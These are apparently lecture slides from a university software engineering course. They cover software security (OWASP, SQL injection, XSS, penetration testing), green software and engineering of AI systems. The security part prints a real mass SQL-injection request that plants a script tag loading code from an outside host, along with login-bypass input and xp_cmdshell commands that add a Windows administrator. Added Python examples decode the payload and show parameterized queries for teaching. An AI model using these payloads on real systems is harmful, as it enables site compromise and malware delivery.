12 Ch12-AdvancedTopics 2021


SOFTWARE ENGINEERING
CO3001

CHAPTER 12 – ADVANCED TOPICS
Anh Nguyen-Duc
Tho Quan-Thanh

Adapted from https://iansommerville.com/software-engineering-book/slides/
WEEK 1


TOPICS COVERED
✓ Software security
✓ Green Software Engineering
✓ Software Engineering for AI systems

CH1. INTRODUCTION
PUZZLE – WHAT IS THIS?

"GET /programs/biosafety/bioSafety_handBook/Chapter%206-
Bloodborne%20Pathogens%20Human%20Tissue?;DECLARE%20@S%20CHAR(4000);S
ET%20@S=CAST(0x4445434C415245204054207661726368617228323535292C
40432076617263686172283430303029204445434C415245205461626C655F43
7572736F7220435552534F5220464F522073656C65637420612E6E616D652C62
2E6E616D652066726F6D207379736F626A6563747320612C737973636F6C756D
6E73206220776865726520612E69643D622E696420616E6420612E78747970653
D27752720616E642028622E78747970653D3939206F7220622E78747970653D3
335206F7220622E78747970653D323331206F7220622E78747970653D3136372
9204F50454E205461626C655F437572736F72204645544348204E455854204652
4F4D20205461626C655F437572736F7220494E544F2040542C4043205748494C
4528404046455443485F5354415455533D302920424547494E20657865632827
757064617465205B272B40542B275D20736574205B272B40432B275D3D5B272B
40432B275D2B2727223E3C2F7469746C653E3C736372697074207372633D2268
7474703A2F2F73646F2E313030306D672E636E2F63737273732F772E6A73223E3
C2F7363726970743E3C212D2D2727207768!6!5726520272B40432B27206E6F74
206C696B6520272725223E3C2F7469746C653E3C736372697074207372633D22
687474703A2F2F73646F2E313030306D672E636E2F63737273732F772E6A73223
E3C2F7363726970743E3C212D2D272727294645544348204E4558542046524F4
D20205461626C655F437572736F7220494E544F2040542C404320454E4420434
C4F5345205461626C655F437572736F72204445414C4C4F43415445205461626
C655F437572736F72%20AS%20CHAR(4000));EXEC(@S);
ANSWER
✓ "GET
/programs/biosafety/bioSafety_handBook/Chapter%206-
Bloodborne%20Pathogens%20Human%20Tissue?;DECLARE%20@S%2
0CHAR(4000);SET%20@S=CAST(0xDECLARE @T varchar(255),@C
varchar(4000) DECLARE Table_Cursor CURSOR FOR select
a.name,b.name from sysobjects a,syscolumns b where a.id=b.id and
a.xtype='u' and (b.xtype=99 or b.xtype=35 or b.xtype=231 or
b.xtype=167) OPEN Table_Cursor FETCH NEXT FROM Table_Cursor
INTO @T,@C WHILE(@@FETCH_STATUS=0) BEGIN exec('update
['+@T+'] set ['+@C+']=['+@C+']+''"></title><script
src="http://sdo.1000mg.cn/csrss/w.js"></script><!--'' wh??re '+@C+'
not like ''%"></title><script
src="http://sdo.1000mg.cn/csrss/w.js"></script><!--''')FETCH NEXT
FROM Table_Cursor INTO @T,@C END CLOSE Table_Cursor
DEALLOCATE Table_Cursor

✓ http://www.dolcevie.com/js/converter.html
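
How the answer is obtained, as an added example (not part of the original slides): URL-decode the logged request line, pull out the hex inside CAST(0x...), and turn it back into readable text for review. The function name `triage_request`, the marker list and the sample request are assumptions made for illustration; the sample's inner statement is constructed and harmless.

```python
import re
from urllib.parse import unquote

# Hex literal wrapped in CAST(0x...), the encoding used by the request above.
CAST_HEX = re.compile(r"CAST\s*\(\s*0x([0-9A-Fa-f]+)", re.IGNORECASE)
# Runtime execution of the decoded string, e.g. EXEC(@S).
EXEC_VAR = re.compile(r"EXEC\s*\(\s*@\w+\s*\)", re.IGNORECASE)
# Keywords worth surfacing to the analyst once the hex is readable.
MARKERS = ("DECLARE", "CURSOR", "SYSOBJECTS", "UPDATE", "<SCRIPT")

def triage_request(request_line):
    """Decode every CAST(0x...) blob in a logged request line for review."""
    decoded_url = unquote(request_line)            # %20 -> space, and so on
    findings = []
    for match in CAST_HEX.finditer(decoded_url):
        hex_text = match.group(1)
        hex_text = hex_text[: len(hex_text) // 2 * 2]   # drop a dangling nibble
        text = bytes.fromhex(hex_text).decode("latin-1")
        findings.append({
            "decoded": text,
            "markers": [m for m in MARKERS if m in text.upper()],
            "executed": EXEC_VAR.search(decoded_url) is not None,
        })
    return findings

# Constructed sample: same shape as the logged request, harmless inner statement.
_INNER = "DECLARE @T varchar(255) SELECT 1"
SAMPLE = ("GET /handbook/page?;DECLARE%20@S%20CHAR(4000);SET%20@S=CAST(0x"
          + _INNER.encode("ascii").hex().upper()
          + "%20AS%20CHAR(4000));EXEC(@S); HTTP/1.1")

if __name__ == "__main__":
    for finding in triage_request(SAMPLE):
        print(finding)
```

A request with no CAST(0x...) wrapper produces an empty list, so the function can be run over a whole access log and only the encoded requests come back.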
DO YOU KNOW?

✓ 75% of attacks today happen at the Application Layer (Gartner).
✓ Many “easy hacking recipes” are published on the web.
✓ Security holes in the web application layer can make a perfectly patched and firewalled server completely vulnerable.

The cost and reputation savings of avoiding a security breach are “priceless”.
SECURITY PROPERTIES

✓ Confidentiality
  - Information about the system or its users cannot be learned by an attacker
✓ Integrity
  - The system continues to operate properly, only reaching states that would occur if there were no attacker
✓ Availability
  - Actions by an attacker do not prevent users from accessing and using the system
GENERAL PICTURE

[Diagram: System, Alice, Attacker]

✓ Security is about
  - Honest user (e.g., Alice, Bob, …)
  - Dishonest Attacker
  - How the Attacker
    - Disrupts honest user’s use of the system (Integrity, Availability)
    - Learns information intended for Alice only (Confidentiality)
Network security

[Diagram: System, Alice, Network Attacker]
Network Attacker: intercepts and controls network communication

Web security

[Diagram: System, Alice, Web Attacker]
Web Attacker: sets up malicious site visited by victim; no control of network

Operating system security

[Diagram: Alice, OS Attacker]
OS Attacker: controls malicious files and applications

[Diagram: System, Alice, Attacker]
Confidentiality: Attacker does not learn Alice’s secrets
Integrity: Attacker does not undetectably corrupt system’s function for Alice
Availability: Attacker does not keep system from being useful to Alice
OWASP TOP TEN LIST

http://www.owasp.org/index.php/Top_10
CROSS-SITE SCRIPTING (XSS) ATTACKS

A hacker was able to insert JavaScript code into the Obama community blog section
The JavaScript would redirect the users to the Hillary Clinton website
YouTube Demonstration
Read about it on ChannelWeb

Websites from FBI.gov, CNN.com, Time.com, Ebay, Yahoo, Apple computer, Microsoft, Zdnet, Wired, and Newsbytes have all had XSS bugs
Mar 2021 CH1. INTRODUCTION
SQL INJECTION ATTACKS

“SQL injection is a security vulnerability that occurs in the database layer of an application. Its source is the incorrect escaping of dynamically-generated string literals embedded in SQL statements.” (Wikipedia)
SQL INJECTION ATTACKS
✓ Login Example Attack
  - Text in blue is your SQL code, text in orange is the hacker input, black text is your application code
  - Login: Password:

✓ Dynamically built SQL string performing authentication:
  - "SELECT * FROM users WHERE login = '" + userName + "' and password= '" + password + "'";

✓ Hacker logs in as: ' or '' = ''; --
  - SELECT * FROM users WHERE login = '' or '' = ''; --' and password=''
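
The login query above, run against an in-memory SQLite database next to its parameterized form, as an added example that is not part of the original slides. The table contents and function names are constructed for illustration; the password is stored in plaintext only to mirror the slide's query.

```python
import sqlite3

def make_db():
    """Build a throwaway in-memory users table with one constructed row."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (login TEXT PRIMARY KEY, password TEXT)")
    # Plaintext only to mirror the slide; real systems store salted hashes.
    db.execute("INSERT INTO users VALUES ('alice', 's3cret')")
    return db

def login_vulnerable(db, user_name, password):
    # Same construction as the slide: input is concatenated into the SQL text,
    # so quotes in the input change the structure of the statement.
    sql = ("SELECT * FROM users WHERE login = '" + user_name +
           "' and password = '" + password + "'")
    return db.execute(sql).fetchone() is not None

def login_parameterized(db, user_name, password):
    # Placeholders send the input as data; it is never parsed as SQL.
    sql = "SELECT * FROM users WHERE login = ? AND password = ?"
    return db.execute(sql, (user_name, password)).fetchone() is not None

# The input shown on the slide.
SLIDE_INPUT = "' or '' = ''; --"

if __name__ == "__main__":
    db = make_db()
    print("concatenated :", login_vulnerable(db, SLIDE_INPUT, ""))
    print("parameterized:", login_parameterized(db, SLIDE_INPUT, ""))
```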
MORE DANGEROUS SQL INJECTION ATTACKS

✓ Hacker creates a Windows Account:
  - SELECT * FROM users WHERE login = ''; exec master..xp_cmdshell 'net users username password /add';--' and password= ''
✓ And then adds himself as an administrator:
  - SELECT * FROM users WHERE login = ''; exec master..xp_cmdshell 'net localgroup Administrators username /add';--' and password= ''
✓ SQL Injection examples are outlined in:
  - http://www.spidynamics.com/papers/SQLInjectionWhitePaper.pdf
  - http://www.unixwiz.net/techtips/sql-injection.html
INSECURE DIRECT OBJECT REFERENCE
✓ “A direct object reference occurs when a developer exposes a reference to an internal implementation object, such as a file, directory, database record, or key, as a URL or form parameter. Attackers can manipulate those references to access other objects without authorization.”

✓ Fancy term for parameter tampering

✓ Involves modifying parameters to access unauthorized materials

✓ E.g. /BankAccount.jsp?acct_nmbr=123
  - The hacker modifies the parameter to view another user's account
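
The missing check behind the /BankAccount.jsp example, as an added example that is not part of the original slides: one handler that trusts the parameter and one that ties the lookup to the session user. The account data, handler names and status codes are constructed for illustration.

```python
from urllib.parse import urlsplit, parse_qs

# Constructed data: account number -> (owner, balance)
ACCOUNTS = {"123": ("alice", 2500), "124": ("bob", 90)}

def handle_vulnerable(session_user, url):
    # Looks up whatever number the client sent; session_user is never consulted.
    acct = parse_qs(urlsplit(url).query).get("acct_nmbr", [""])[0]
    record = ACCOUNTS.get(acct)
    return (200, record[1]) if record else (404, None)

def handle_checked(session_user, url):
    values = parse_qs(urlsplit(url).query).get("acct_nmbr", [])
    # Exactly one, purely numeric value; anything else is rejected before lookup.
    if len(values) != 1 or not values[0].isdigit():
        return (400, None)
    record = ACCOUNTS.get(values[0])
    # Missing and not-owned accounts get the same answer, so responses do not
    # reveal which account numbers exist.
    if record is None or record[0] != session_user:
        return (404, None)
    return (200, record[1])

if __name__ == "__main__":
    url = "/BankAccount.jsp?acct_nmbr=124"     # alice asking for bob's account
    print("vulnerable:", handle_vulnerable("alice", url))
    print("checked   :", handle_checked("alice", url))
```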
MALICIOUS FILE EXECUTION
✓ “Code vulnerable to remote file inclusion (RFI) allows attackers to include hostile code and data, resulting in devastating attacks, such as total server compromise. Malicious file execution attacks affect PHP, XML and any framework which accepts filenames or files from users.”
✓ Happens when code is executed on the server from a non-trusted source
  - All web applications are vulnerable to malicious file execution if they accept filenames or files from the user.

✓ Classic example: PHP is particularly vulnerable
  - Hacker visits a website that allows uploads
  - Hacker uploads malicious code
  - Hacker learns directory structure and sends the path as a parameter
  - PHP code is executed on the server
  - include $_REQUEST['filename'];
✓ https://cve.mitre.org
✓ https://cwe.mitre.org

The Common Weakness Enumeration (CWE) is a category system for software weaknesses and vulnerabilities. It is sustained by a community project with the goals of understanding flaws in software and creating automated tools that can be used to identify, fix, and prevent those flaws.



VULNERABILITY ASSESSMENT

• Assess and secure all parts individually
• The idea is to force an attacker to penetrate several defence layers
• As a general rule, data stored in databases are considered as "untrusted"

"In God we trust, for the rest, we test"
TWO OPTIONS

✓ Static analysis
  - Automated methods to find errors or check their absence
  - Consider all possible inputs (in summary form)
  - Find bugs and vulnerabilities
  - Can prove absence of bugs, in some cases

✓ Dynamic analysis
  - Run instrumented code to find problems
  - Need to choose sample test input
  - Can find vulnerabilities but cannot prove their absence
STATIC ANALYSIS

✓ Long research history
✓ Decades of commercial products
  - FindBugs, Fortify, Coverity, MS tools, …
ON THE EFFECTIVENESS OF STATIC TESTING

Nguyen-Duc, A., Do, M. V., Luong Hong, Q., Nguyen Khac, K., & Nguyen Quang, A. (2021). On the adoption of static analysis for software security assessment–A case study of an open-source e-government project. Computers & Security, 111, 102470. https://doi.org/10.1016/j.cose.2021.102470
DYNAMIC ANALYSIS

✓ Instrument code for testing
  - Heap memory: Purify
  - Perl tainting (information flow)
  - Java race condition checking
✓ Black-box testing
  - Fuzzing and penetration testing
  - Black-box web application security analysis
PENETRATION TESTING

✓ A penetration test is a method of evaluating the security of a computer system or network by simulating an attack from a malicious source, known as a Black Hat Hacker, or Cracker. – Wikipedia



PENETRATION TESTING VS. VULNERABILITY ASSESSMENT

✓ Vulnerability Assessment:
  - Predictable. Can be planned & designed
  - Unreliable at times and high rate of false positives. (I’ve got a banner)
  - Produces a report with mitigation guidelines and action items.
✓ Penetration Testing:
  - Unpredictable by the recipient. (Don’t know the “how?” and “when?”)
  - Highly accurate and reliable. (I’ve got root!)
  - Penetration Testing = Proof of Concept against vulnerabilities.
  - Produces a binary result: Either the team owned you, or they didn't.



PENTEST - STEPS

✓ Analysis and Information Gathering
✓ Network Enumeration and Scanning
✓ Vulnerability Testing and Exploitation
✓ Reporting



PENTEST - STEPS

✓ Analysis and Information Gathering
  - To discover as much information about a target (individual or organization) as possible without actually making network contact with said target.
  - Methods:
    - Organization info discovery via WHOIS
    - Google search
    - Website browsing



PENTEST - STEPS

✓ Analysis and Information Gathering
✓ Network Enumeration and Scanning
  - To discover existing networks owned by a target as well as live hosts and services running on those hosts.
  - Methods:
    - Scanning programs that identify live hosts, open ports, services, and other info (Nmap, autoscan)
    - DNS Querying
    - Route analysis (traceroute)



PENTEST - STEPS

✓ Analysis and Information Gathering
✓ Network Enumeration and Scanning
✓ Vulnerability Testing and Exploitation
  - To check hosts for known vulnerabilities and to see if they are exploitable, as well as to assess the potential severity of said vulnerabilities.
  - Methods:
    - Remote vulnerability scanning (Nessus, OpenVAS)
    - Active exploitation testing
      - Login checking and bruteforcing
      - Vulnerability exploitation (Metasploit, Core Impact)
      - 0day and exploit discovery (Fuzzing, program analysis)
      - Post exploitation techniques to assess severity (permission levels, backdoors, rootkits, etc)
GREEN SOFTWARE ENGINEERING

Aug 2019 CH1. INTRODUCTION


SOFTWARE ENGINEERING AND SUSTAINABILITY


GREENING IT VS GREENING BY IT

Silvana Trimi & Sang-Hyun Park, 2013. "Green IT: practices of leading firms and NGOs," Service Business,
Springer;Pan-Pacific Business Association, vol. 7(3), pages 363-379, September.
SOFTWARE ENGINEERING AND SUSTAINABILITY - EXAMPLE

✓ Green Software Engineering is an emerging discipline at the intersection of climate science, software practices and architecture, electricity markets, hardware and data centre design.
✓ Green Software Engineering concerns the design, development and operation of software-intensive products in a way that reduces pollution, promotes sustainability, and minimizes risk to human health and the environment without sacrificing economic viability and efficiency
https://principles.green/
SOFTWARE ENGINEERING AND SUSTAINABILITY - TOPICS

✓ Sustainability Theory
✓ Requirements Engineering for Sustainability
✓ Sustainability Analysis
✓ Sustainability issues in Software Architecture and Design
✓ Sustainable System Modelling
✓ Sustainability Engineering Process
✓ Sustainability in Testing and Quality Assurance
✓ Sustainability Management Process
Torre, D., Procaccianti, G., Fucci, D., Lutovac, S. and Scanniello, G. 2017. On the presence of green and sustainable software engineering
in higher education curricula. Proceedings of the 1st International Workshop on Software Engineering Curricula for Millennials (Buenos
Aires, Argentina, May 2017), 54–60.
SOFTWARE ENGINEERING FOR AI

https://blog.re-work.co/how-does-netflix-know-what-movies-youll-enjoy/
AI systems - frontend

https://medium.com/dvt-engineering/narc-a-fault-detecting-solution-1e68bf239d71
Classification of AI

❑ Weak AI vs. Strong AI
❑ Super AI
❑ Friendly AI
WHAT DOES IT MEAN TO ENGINEER AN AI SYSTEM?

Sculley, D., Holt, G., Golovin, D., Davydov, E., Phillips, T., Ebner, D., Chaudhary, V., Young, M., Crespo, J.-F. and Dennison, D. 2015.
Hidden Technical Debt in Machine Learning Systems. Proceedings of the 28th International Conference on Neural Information
Processing Systems - Volume 2 (Cambridge, MA, USA, 2015), 2503–2511.

https://docs.microsoft.com/en-us/azure/machine-learning/team-data-science-process/overview

ENGINEERING PERSPECTIVE

P. Santhanam et al. Engineering Reliable Deep Learning Systems. https://arxiv.org/abs/1910.12582
https://hbr.org/2018/01/artificial-intelligence-for-the-real-world

7 GLOBAL SME CASE STUDIES

o unclear business scenarios
o failure to align business expectation with project reality
o communication breakdown between AI experts and customers
o lack of metrics to evaluate AI project
o Integration with various business processes
o Supporting organizational transformation
o Addressing trustworthiness and ethical concerns

Nguyen-Duc, A., Sundbø, I., Nascimento, E., Conte, T., Ahmed, I. and Abrahamsson, P. 2020. A Multiple Case Study of Artificial
Intelligent System Development in Industry. Proceedings of the Evaluation and Assessment in Software Engineering (Trondheim,
Norway, Apr. 2020), 1–10.

CASE STUDIES ON AI COMPANIES


PROBLEMS

o unclear business scenarios
o failure to align business expectation with project reality
o communication breakdown between AI experts and customers
o lack of metrics to evaluate AI project
o Integration with various business processes
o Supporting organizational transformation
o Addressing trustworthiness and ethical concerns
Q&A
